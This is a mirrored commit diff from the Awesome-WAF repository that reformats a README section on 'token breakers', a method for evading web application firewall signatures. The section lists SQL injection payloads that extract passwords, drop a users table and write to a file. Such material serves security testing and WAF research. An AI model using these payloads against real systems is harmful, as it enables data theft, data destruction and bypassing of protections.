mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2024-12-22 23:13:28 +07:00
Code Issues Packages Projects Releases Wiki Activity

Added stuff follow up update

Browse Source
This commit is contained in:
0xInfection 2019-06-21 21:07:30 +05:30
parent b4afef22b6
commit 179eda145d
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
README.md
View File

@ -2475,12 +2475,12 @@ __13. Token Breakers__
- Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
- However, the request must still remain valid while using token-breakers.
__Case__: Unknown Token for the Tokenizer
__Payload__: `?id=-sqlite_version() UNION SELECT password FROM users --`
- __Case__: Unknown Token for the Tokenizer
- __Payload__: `?id=-sqlite_version() UNION SELECT password FROM users --`
__Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
__Payload 1__: `?id=123);DROP TABLE users --`
__Payload 2__: `?id=1337) INTO OUTFILE xxx --`
- __Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
- __Payload 1__: `?id=123);DROP TABLE users --`
- __Payload 2__: `?id=1337) INTO OUTFILE xxx --`
> __TIP:__ More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).